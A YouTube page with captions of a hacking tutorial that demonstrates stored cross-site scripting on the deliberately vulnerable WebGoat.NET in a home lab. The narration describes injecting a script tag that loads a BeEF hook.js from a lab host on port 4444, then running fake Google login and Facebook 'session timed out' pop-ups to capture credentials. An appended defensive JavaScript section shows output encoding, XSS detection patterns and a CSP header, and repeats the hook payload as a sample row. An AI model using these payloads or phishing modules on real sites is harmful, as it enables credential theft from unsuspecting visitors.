Cross-Site Scripting (XSS) Explained And Demonstrated By A Pro Hacker!

Video Statistics and Information

Captions
...and click login. That's it, game over. We got that username and password just like that.

Hi and welcome back to another episode on how to hack, and today I'll be teaching you ethical hacking via cross-site scripting. So what does cross-site scripting mean? It means they allow us to literally plant our own code into any website, allowing us to track the users, redirect the website and do literally anything that you want. And additionally, we'll also be using Browser Exploitation Framework to help us plant our own code, our own script, into any website so that we have full control of the entire site. Sounds pretty dangerous, isn't it? Yes it is. That's why, big disclaimer, right: hacking is illegal. If you want to hack, hack in your own home lab environment, just like what I'm doing here on WebGoat, which is installed in my own home lab environment. By the way, remember to subscribe to the channel so that you can learn all about ethical hacking and penetration testing, and like the video if all this content has been valuable and insightful for you. So without further ado, let us get started on today's tutorial.

[Music]

So right in front of us we have WebGoat.NET, which is a vulnerable web application system for us to perform our penetration testing and all the ethical hacking techniques on this particular platform. And right here on the left side I have cross-site scripting, and I can go ahead and click on the stored XSS. So what this does right here is, it is very similar to any website you go to, right, any sites where you can post a comment, post a review. And right here on the email, all I got to do now is go ahead and enter, say, my email, all right, loy leong young at loyola.com, and all I got to do under the comment section is to go ahead and enter any comments. So for example I can enter, all right, "this is a test comment". All right, go ahead and click save comment. So the first thing you want to do whenever you're encountering any features, any functions, is to go ahead and test it out and see what is considered as a normal behavior.

Next up, what you can do is, now this is the exciting part, this is the part that you are waiting for, and that is to test whether the comment or the email section is vulnerable to cross-site scripting, meaning are we able to plant our own script into the site. So what I can do now is to go ahead and enter under the comments section, or I can open script and I can close script, and what I can do right in the middle is to go ahead and enter an alert to see if this will get loaded as a script rather than as website content. So I can go ahead and enter the following, "hacked by Loi", all right, and I can close this with a semicolon. Go ahead and click save comment and boom, we are in. Literally our own code just got loaded, just like that. As simple as that, we managed to find one vulnerability in which we can now plant our own malicious code. And it's pretty easy, isn't it? And that's scary, because you can literally try to find all these places, text input boxes, and you could try to plant any of the script in, and that's it, game over, we are in.

So how can I demonstrate further about the ability for us to control the entire website? So go ahead and click OK on this and go to the top left corner, and I'll click under testing database, I'll scroll down further and I can click rebuild database. So the wonderful part about this on WebGoat is that whenever you screw up anything, all right, you can easily try to rebuild the entire database and you can start afresh. So that's wonderful, that's amazing, because you can keep testing different techniques and you will not have to worry about actually taking down the entire server. So that's fantastic.

So once the database has been rebuilt, right, you can go ahead and go back to cross-site scripting, click under stored XSS, and what I can do here now is to go ahead and open up Browser Exploitation Framework. So I have already downloaded it and I can go ahead and cd beef, all right, and I can enter ls to see all the files that are part of BeEF. And you can easily do a git clone on this, and this is the link to GitHub where you can download Browser Exploitation Framework for you to run and implant all this malicious code and script into any website. So I have already downloaded it, and all I got to do now is go ahead and start Browser Exploitation Framework. So I can enter sudo ./beef, hit enter on this, enter your password for super user, hit enter, and now we are loading up Browser Exploitation Framework.

So next up, what we can do here, the important part is this particular item, this particular row, which is called hook URL. So this is the JavaScript which will then allow us the ability to plant it into literally any website that you have found a vulnerability for cross-site scripting on. So all I got to do now is do a right-click and I can click under copy link address. I can go back to any browser and paste it over here and hit enter, and this is, right, as you can see here, jQuery, JavaScript, all these different details right here, okay, and some parts of it you can easily copy, and that would allow you access to different components of a browser.

So once you got a link, all right, all we got to do is ensure that we can copy the link, go back to the vulnerable website, and in this case I can go and enter email, so I, loy leongyan at loyolan.com, and under the comment section I can go and enter script source equal, okay, and I can do a double quote and paste the link which will point us to the JavaScript file, and I can now close the script. So once I close the script I can go ahead and click save comment. All right, so here we go, we got it, we're in. We have just planted our malicious code into the website, allowing us to track users and to control the entire website fully.

So what we can do now is do a right click and click inspect element to see if our script got loaded. All right, so I can see here we have content, okay, as the following, and I can go ahead and open content, and right here in the bottom left side I can see the following, right: we have the email, which is loyalian and loylangen.com, and right here we can see the following. All right, this is the part that we're looking for. So we have script source and we got 192.168.0.106, which is our Kali Linux machine, followed by the port number, which is 4444, followed by /hook.js. All right, so we have planted our script into the site, which has a vulnerable comment section. And again, you can plant this anywhere: it can be a comment section, it can be on a review section, it can even be on the search section and so on.

So once you have it running, all we got to do next is to log in to Browser Exploitation Framework. So going back to terminal, all right, we have the link to the user interface, so all I got to do now is right click on the UI panel, click open link, and this will open up a new tab on Firefox or any browser. So go ahead and enter the username, so in my case I have the username of loy leong young, and I can enter a password that I've set during the creation of Browser Exploitation Framework. And once we log in, you can see right here, all right, on the left side we have the following information, so let me zoom in a little more so that it is easier for you to see. So on the left side I have the IP addresses, and I have the IP addresses of all those browsers who have come in and loaded the JavaScript that we have planted into any of these sites. And here we have the online browser, okay, so right here we can see that this is the browser that's currently inside the platform.

And what I can do next is to go back into another browser, okay, so this is my host browser that I'm doing all these tutorials for you, and when I go under the cross-site scripting, I click on the stored XSS, and I clicked on it, and what we are seeing here is that we have just loaded the script too. As you can see right here, email as well as the comments section, we test the script and we have verified that via inspect element. Going back to Kali Linux, we can see right here we have a new IP address coming in, and we can tell that this is a Windows 10 computer based on the pop-up that's showing right here on the left side, and we can see all the browser capabilities so that we can prepare for the next type of cyber attack that we can launch against the browser. And as you can see here, we have the date stamp, we have the browser language, so I am coming from Singapore, and we can see that there are certain plugins that the browser can take in, okay, so we can see all these details and all this different kind of data.

But what's more interesting and more frightening is, what can we do now that we have loaded our code? What we can do is go under the command section, and we can select under, say for example, social engineering, and right here this is the part where we can actually control the website to display different kinds of information back to the user. Literally all I got to do is enter, say for example, Google Phishing, and I can click execute, right. So once I click execute, what we can see next is, when I go back to the browser, we are now being placed into a login page. And this is scary, isn't it, because all we did was go to an actual website, look at the comments, and the next thing you know you are hacked.

What else can we do? Going back to Kali Linux, going back to Browser Exploitation Framework, I can select, say for example, Pretty Theft, and again I'll now go ahead and click under execute, and going back to the browser we see that there's a pop-up, "Facebook session timed out". So very quickly there's a fake pop-up, and say the user goes ahead and enters the username or the email address and hits onto the password field and clicks login. That's it, game over. We got that username and password just like that. And if I go back to Kali Linux I can see that there is a module results history. I'll go ahead and click on it, and right here we can see the email as well as the password. Of course this is not my real password, so this is a password I use for demonstration purposes, okay, so if you're trying to log into my account using this password you will not be able to get access into the account.

All right, I hope you learned something valuable in today's tutorial, and if you have any questions feel free to leave a comment below and I'll try my best to answer any of your questions. And remember to like, share and subscribe to the channel so that you can be kept abreast of the latest cyber security tutorials. Thank you so much once again for watching.
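Added example, not part of the video or its captions: the defensive side of the stored XSS shown above, with the unsafe rendering next to output encoding, an audit of stored rows, and a Content-Security-Policy that refuses scripts from other origins. All function names and the sample rows are constructed for illustration; the second row is modelled on the comment described in the captions, with the `http://` scheme assumed.

```javascript
// HTML-encode the characters that let stored text break out of text or attribute context.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Vulnerable pattern: stored fields are concatenated straight into markup,
// so a stored <script> element is parsed and run by every visitor's browser.
function renderCommentUnsafe(row) {
  return '<div class="comment"><b>' + row.email + '</b><p>' + row.comment + '</p></div>';
}

// Hardened pattern: every stored field is encoded at output time.
function renderCommentSafe(row) {
  return '<div class="comment"><b>' + escapeHtml(row.email) +
         '</b><p>' + escapeHtml(row.comment) + '</p></div>';
}

// Audit already-stored rows: flag markup that has no place in an email or comment.
const SUSPICIOUS = [
  { name: 'script-element', re: /<\s*script\b/i },
  { name: 'event-handler', re: /<[^>]+\son\w+\s*=/i },
  { name: 'javascript-url', re: /javascript\s*:/i },
];
function auditComments(rows) {
  const findings = [];
  for (const row of rows) {
    for (const field of ['email', 'comment']) {
      const hits = SUSPICIOUS.filter((p) => p.re.test(row[field])).map((p) => p.name);
      if (hits.length > 0) findings.push({ id: row.id, field, hits });
    }
  }
  return findings;
}

// Response header as a second layer: only same-origin script files may load,
// so neither an inline alert nor a script hosted on another machine executes.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Constructed sample rows (not taken from any real database).
const SAMPLE_ROWS = [
  { id: 1, email: 'user@example.test', comment: 'this is a test comment' },
  { id: 2, email: 'user@example.test',
    comment: '<script src="http://192.168.0.106:4444/hook.js"></script>' },
];
```

Encoding at output is the primary fix; the audit finds rows stored before the fix, and the header limits the damage if an encoding call is missed somewhere.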
Info
Channel: Loi Liang Yang
Views: 304,879
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp
Id: PPzn4K2ZjfY
Length: 9min 31sec (571 seconds)
Published: Sun Apr 18 2021